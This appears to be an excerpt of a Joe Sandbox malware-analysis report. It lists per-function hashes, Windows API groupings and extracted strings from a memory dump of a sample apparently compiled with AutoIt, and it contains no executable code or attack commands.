                                                                        • Instruction ID: 11c0740be560e3ded6a4638111708f8591c108c38b0062447f83a8428d21d02d
                                                                        • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                        • Instruction Fuzzy Hash: 54218133B2454586E709CF79D8526B933E5B769708F08C13AD62B87694DE3DE909CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                        • Instruction ID: 3815ab775f4f2914b22dc2e9c94ad691e3b0b182bbe61da1bcb70c309767f05f
                                                                        • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                        • Instruction Fuzzy Hash: D5F04FB1B182958ADBA4CF2CA853A397790F70C384FD08139DA8DC3E54DE3C90619F04
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                        • Instruction ID: df329de19478d51b8ac16c9081c04288bcbb424a05e493d33cdbd14672df11d5
                                                                        • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                        • Instruction Fuzzy Hash: 4EA0026595EC02D4E6048B08F8500302730FB5831CB510432D20DC14B59F3CA485C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 3521893082-0
                                                                        • Opcode ID: a1934e377bf19be0261ecab6ae9ab8a3b413be01dac9d1bc3f09b8c2d843b02b
                                                                        • Instruction ID: 54d94029bb23fbabcc3969bf5725852f63d31ceb7fa651fa0681d59c0baa60d4
                                                                        • Opcode Fuzzy Hash: a1934e377bf19be0261ecab6ae9ab8a3b413be01dac9d1bc3f09b8c2d843b02b
                                                                        • Instruction Fuzzy Hash: 69A18032F04A1286EB14CB69E88467D2761BB4CBA9F104735DF2E97BA4DF3CE4448740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: bbb8373922c4c1ac776fb25ab571143455ae640d91028c4cde848772eb275b70
                                                                        • Instruction ID: 1e035334ab8c19efef1287358fb34e0e70ffa8014092e7a1022a0571ac6269cf
                                                                        • Opcode Fuzzy Hash: bbb8373922c4c1ac776fb25ab571143455ae640d91028c4cde848772eb275b70
                                                                        • Instruction Fuzzy Hash: 95B16E61B0CA42D0EA649B6DD96017C3761FB5878CB944132DB2ED7AB9DF2CF949CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: ab32fec2114cc7797343045e8234e8b8459b98e881f5fb7974a6d5b650555941
                                                                        • Instruction ID: 75bfe5812cfc08462ffafc42c3e3c5475d25ea0b4fb41cdadf67a32490822a7e
                                                                        • Opcode Fuzzy Hash: ab32fec2114cc7797343045e8234e8b8459b98e881f5fb7974a6d5b650555941
                                                                        • Instruction Fuzzy Hash: 58718236A08A5186E724DB59F85467A7361FB8DBA9F004335DE6E87BA4DF3CE444C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: tooltips_class32
                                                                        • API String ID: 698492251-1918224756
                                                                        • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                        • Instruction ID: 13e2845fc6036e14897a0d4ce924906ff3503c57de1ffab2f85ed179b7346912
                                                                        • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                        • Instruction Fuzzy Hash: 58C13D72A08B458AEB54CF69E4542AE77A0FB8DB98F500035DB5E8BB64DF78E851C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID: @
                                                                        • API String ID: 3869813825-2766056989
                                                                        • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                        • Instruction ID: e63ec300528246eb95182f5a3e57be6baffd3b93726fbee29ce0c441af3ed21c
                                                                        • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                        • Instruction Fuzzy Hash: 9A815B32A04A4286E740DF79E9546AD33A0FB48B8CF844531DF4EE7668DF38E946C750
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                        • API String ID: 2091158083-3440237614
                                                                        • Opcode ID: 1dfcd66b1beb431dd94c898c6b643c1c8ea49badc5456dbef34fa79d17b29ff8
                                                                        • Instruction ID: da6fb0cce8feee07081a3a7a42ae9033cd9c847a0931d70200ebcf37d8fb6d72
                                                                        • Opcode Fuzzy Hash: 1dfcd66b1beb431dd94c898c6b643c1c8ea49badc5456dbef34fa79d17b29ff8
                                                                        • Instruction Fuzzy Hash: 1F714032618A8296E710DB59F8447ED7720FB89798F901032EF4E87AA9DF7CD649C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 1600147383-4113822522
                                                                        • Opcode ID: f7a7ab7ec1fa580d5e6ff973f8f4b9d76ff6f996739de9da71bd8b134ea55aea
                                                                        • Instruction ID: 5854ba1966c0d0e59c432b7a7397b84dda6bb83ebd17a821d09a3169c6603a99
                                                                        • Opcode Fuzzy Hash: f7a7ab7ec1fa580d5e6ff973f8f4b9d76ff6f996739de9da71bd8b134ea55aea
                                                                        • Instruction Fuzzy Hash: C8818A22B18A52C5EB109B69D8512BC23A1FB58B9CF544432CF1DD7BA5EF3CE94AC740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                        • String ID: .dll$.exe$.icl
                                                                        • API String ID: 258715311-1154884017
                                                                        • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                        • Instruction ID: e7c0bda2d7c9ac94508c6cd3da105b425ac4ae1aa6c3e9cd539856407faa9c93
                                                                        • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                        • Instruction Fuzzy Hash: E371C232A45A668AEB24CF29E4546B923A4FB4CB9CF040635EE5D877B4DF3CE545C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                        • Instruction ID: 26d66eeec1b1e7f237e774a66b998c06f15f891f8bb5d0545fddec86178824e0
                                                                        • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                        • Instruction Fuzzy Hash: 8B515436B54B558AEB14CF6AE858AAD33A4FB8CB99B504131DE1E83B24DF3DE405C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit
                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                        • API String ID: 2610073882-3931177956
                                                                        • Opcode ID: ac889367bae4e254e0e35ddf33c20c4b5cb295985cb73c3a9e2cda7ca1084c4c
                                                                        • Instruction ID: dbedc8be0db3d40f81e540e92bca15b67831a9bcf16de157b576980d266d32f6
                                                                        • Opcode Fuzzy Hash: ac889367bae4e254e0e35ddf33c20c4b5cb295985cb73c3a9e2cda7ca1084c4c
                                                                        • Instruction Fuzzy Hash: D9028F32A0864685E758AF6DC16417D23A5FF0AB98F094135CB1E97BA4DF2DF968CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                        • String ID: aut
                                                                        • API String ID: 130057722-3010740371
                                                                        • Opcode ID: b723f37c5c9f49deb94b7e2ba47ba0053f3298e7adf33b8eeadd62bc7b029919
                                                                        • Instruction ID: 54a311153e02607598f4ee75d7b9dbb41761284fd6bf234ab7ba8e1838287613
                                                                        • Opcode Fuzzy Hash: b723f37c5c9f49deb94b7e2ba47ba0053f3298e7adf33b8eeadd62bc7b029919
                                                                        • Instruction Fuzzy Hash: 47C15732618AC695EB30DF29E8405E96751FB9978CF404036EB5D87B69DF7CE209CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 1111067124-438819550
                                                                        • Opcode ID: 3ca7d68079c1ff763c9ee0aef9738ae99c5ba69d20ea6bec99791ff82066f6f2
                                                                        • Instruction ID: 5c35ec577eb53601a0ebf1977f7249bd5729fa0afda62ae2858eb7fc5d91b7a1
                                                                        • Opcode Fuzzy Hash: 3ca7d68079c1ff763c9ee0aef9738ae99c5ba69d20ea6bec99791ff82066f6f2
                                                                        • Instruction Fuzzy Hash: C7715F32618B8691EB10DF19D8401EE6761FB88B8CF445031DB5D87BB6DF79E549CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2598888154-3916222277
                                                                        • Opcode ID: fcfdd97660a26b14c0ccb4ba546d19d1c0237f5a0672d4ae4f5d43f9cb811bfd
                                                                        • Instruction ID: da41a495cfa10f75ebf346efddae380ca7ef6abcb108be66af35b5e5917346db
                                                                        • Opcode Fuzzy Hash: fcfdd97660a26b14c0ccb4ba546d19d1c0237f5a0672d4ae4f5d43f9cb811bfd
                                                                        • Instruction Fuzzy Hash: CE512676B15641CBE750CF69E454AAE77B5F748B8CF009529EF4A93B28CF38E4158B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 2706829360-2785691316
                                                                        • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                        • Instruction ID: 98b7a34969887ca74b12c3569b663d3d68d47d740af66de9aaebe65a0f04cf70
                                                                        • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                        • Instruction Fuzzy Hash: 48514C22B15A528AEB40DF69D8856BD3771FB88B8DF404031EB0E87679DF39E04AC740
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF6BB1BFD7B), ref: 00007FF6BB1C1143
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                        • API String ID: 3964851224-909552448
                                                                        • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                        • Instruction ID: 44bd8d0f96ae7b7280745f784299c2e68f7a3cb74e317e743e90fe3abd40fddf
                                                                        • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                        • Instruction Fuzzy Hash: 02E18012F8965781EA609F6DD8402B922A1BF19B9CB484535DB1ECB7E4EF3CE965C300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: LoadStringwprintf
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 3297454147-3080491070
                                                                        • Opcode ID: 59800c54c1d345ecb424e2fcfa2246da67464ce5bbb623b99681ad9037b4dde3
                                                                        • Instruction ID: 433a6aa4421af26af6ebdfa51a4e569aeab8412adf21ec052a58e19c791ead96
